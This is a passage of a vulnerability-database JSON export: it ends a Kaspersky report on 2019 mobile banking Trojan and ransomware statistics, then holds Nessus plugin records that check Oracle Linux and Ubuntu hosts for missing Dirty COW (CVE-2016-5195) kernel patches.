\n\n_Number of attacks by mobile banking Trojans in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152448/mobile_report_2019_12-en-bankers-attacks.png>)\n\nIt is worth noting that the average number of attacks over the year was approximately 270,000 per month. \n\n**Top 10 countries by share of users attacked by banking Trojans**\n\n| Country | %* \n---|---|--- \n1 | Russia | 0.72 \n2 | South Africa | 0.66 \n3 | Australia | 0.59 \n4 | Spain | 0.29 \n5 | Tajikistan | 0.21 \n6 | Turkey | 0.20 \n7 | USA | 0.18 \n8 | Italy | 0.17 \n9 | Ukraine | 0.17 \n10 | Armenia | 0.16 \n \n_*Share of users attacked by mobile bankers out of all attacked users_\n\nRussia (0.72%) has headed our Top 10 for three consecutive years: many different Trojan families are focused on stealing credentials from Russian banking apps. These Trojans operate in other countries as well. Thus, Asacub is the number one threat in Tajikistan, Ukraine, and Armenia, while the Svpeng family of Trojans is active in Russia and the US.\n\nIn South Africa (0.66%), the most common Trojan was Trojan-Banker.AndroidOS.Agent.dx, accounting for 95% of all users attacked by banking threats. 
\n\nThe most widespread Trojan in Australia (0.59%) was Trojan-Banker.AndroidOS.Agent.eq (77% of all users attacked by banking threats).\n\nIn Spain (0.29%), banking malware from the Cebruser and Trojan-Banker.AndroidOS.Agent.ep families are popular with cybercriminals (49% and 22% of all users attacked by banking threats, respectively).\n\n**Top 10 families of mobile bankers in 2019**\n\n| Family | %* \n---|---|--- \n1 | Asacub | 44.40 \n2 | Svpeng | 22.40 \n3 | Agent | 19.06 \n4 | Faketoken | 12.02 \n5 | Hqwar | 3.75 \n6 | Anubis | 2.72 \n7 | Marcher | 2.07 \n8 | Rotexy | 1.46 \n9 | Gugi | 1.34 \n10 | Regon | 1.01 \n \n_*Share of users attacked by this family of mobile bankers out of all users attacked by mobile banking Trojans_\n\n### Mobile ransomware Trojans\n\nIn 2019, we detected 68,362 installation packages for ransomware Trojans, which is 8,186 more than in the previous year. However, we observed a decline in the generation of new ransomware packages throughout 2019. The minimum was recorded in December. \n\n_Number of new installation packages for mobile banking Trojans in Q1\u2013Q4 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152452/mobile_report_2019_13-ransomware-packages.png>)\n\nA similar picture is seen for attacked users. 
Whereas in early 2019, the number of attacked users peaked at 12,004, by the end of the year, the figure had decreased 2.6 times.\n\n_Number of users attacked by mobile ransomware Trojans in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152457/mobile_report_2019_14-en-ransom-attack-users.png>)\n\n_Countries by share of users attacked by mobile ransomware in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152502/mobile_report_2019_15-en-ransomware-geo.png>)\n\n**Top 10 countries by share of users attacked by ransomware Trojans**\n\n| Country* | %** \n---|---|--- \n1 | USA | 2.03 \n2 | Kazakhstan | 0.56 \n3 | Iran | 0.37 \n4 | Mexico | 0.11 \n5 | Saudi Arabia | 0.10 \n6 | Pakistan | 0.10 \n7 | Canada | 0.10 \n8 | Italy | 0.09 \n9 | Indonesia | 0.08 \n10 | Australia | 0.06 \n \n_*Excluded from the rating are countries with fewer than 25,000 active users of Kaspersky mobile solutions in the reporting period. \n**Unique users attacked by mobile ransomware in the country as a percentage of all users of Kaspersky mobile solutions in the country._\n\nFor the third year in a row, first place by share of users attacked by mobile ransomware went to the US (2.03%). Same as last year, the Svpeng ransomware family was the most commonly encountered in the country. It was also the most widespread in Iran (0.37%).\n\nThe situation in Kazakhstan (0.56%) was unchanged: the country still ranks second, and the most prevalent threat there remains the Rkor family. \n\n## Conclusion\n\nThe year 2019 saw the appearance of several highly sophisticated mobile banking threats, in particular, malware that can interfere with the normal operation of banking apps. The danger they pose cannot be overstated, because they cause direct losses to the victim. 
It is highly likely that this trend will continue into 2020, and we will see more such high-tech banking Trojans.\n\nAlso in 2019, attacks involving the use of mobile stalkerware became more frequent, the purpose being to monitor and collect information about the victim. In terms of sophistication, stalkerware is keeping pace with its malware cousins. It is quite likely that 2020 will see an increase in the number of such threats, with a corresponding rise in the number of attacked users.\n\nJudging by our statistics, adware is gaining ever more popularity among cybercriminals. In all likelihood, going forward we will encounter new members of this class of threats, with the worst-case scenario involving adware modules pre-installed on victims' devices.\n\n[](<https://www.brighttalk.com/webcast/15591/388802?utm_source=securelist&utm_medium=blog&utm_campaign=gl_webinar-yara-2020_sl0099&utm_content=link&utm_term=gl_securelist__sl0099_link_blog_webinar-yara-2020>)", "modified": "2020-02-25T10:00:43", "published": "2020-02-25T10:00:43", "id": "SECURELIST:B700542D10BA5EEA36C5D69A24B3C6EE", "href": "https://securelist.com/mobile-malware-evolution-2019/96280/", "type": "securelist", "title": "Mobile malware evolution 2019", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-17T12:50:48", "description": "From Red Hat Security Advisory 2016:2098 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "edition": 36, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-25T00:00:00", "title": "Oracle Linux 7 : kernel (ELSA-2016-2098) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-tools", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-tools-libs", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-tools-libs-devel", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2016-2098.NASL", "href": "https://www.tenable.com/plugins/nessus/94247", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:2098 and \n# Oracle Linux Security Advisory ELSA-2016-2098 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n 
script_id(94247);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"RHSA\", value:\"2016:2098\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Oracle Linux 7 : kernel (ELSA-2016-2098) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:2098 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. 
(CVE-2016-5195,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-October/006442.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2016-2098\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.10\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-abi-whitelists-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", 
reference:\"kernel-devel-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-doc-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-headers-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.36.3.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.36.3.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:21:49", "description": "It was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-25T00:00:00", "title": "Ubuntu 16.10 : linux-raspi2 vulnerability (USN-3107-2) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-raspi2", "cpe:/o:canonical:ubuntu_linux:16.10"], "id": "UBUNTU_USN-3107-2.NASL", "href": "https://www.tenable.com/plugins/nessus/94249", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3107-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94249);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"USN\", value:\"3107-2\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Ubuntu 16.10 : linux-raspi2 vulnerability (USN-3107-2) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3107-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-4.8-raspi2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. 
/ NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3107-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.10\", pkgname:\"linux-image-4.8.0-1017-raspi2\", pkgver:\"4.8.0-1017.20\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.8-raspi2\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:21:48", "description": "It was discovered that a race condition existed in the memory manager\nof the Linux 
kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 38, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-20T00:00:00", "title": "Ubuntu 16.10 : linux vulnerability (USN-3107-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-lowlatency", "cpe:/o:canonical:ubuntu_linux:16.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-generic-lpae"], "id": "UBUNTU_USN-3107-1.NASL", "href": "https://www.tenable.com/plugins/nessus/94159", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3107-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94159);\n script_version(\"2.17\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"USN\", value:\"3107-1\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Ubuntu 16.10 : linux vulnerability (USN-3107-1) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3107-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.8-generic,\nlinux-image-4.8-generic-lpae and / or linux-image-4.8-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.8-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.10\", \"Ubuntu \" + release);\nif ( ! 
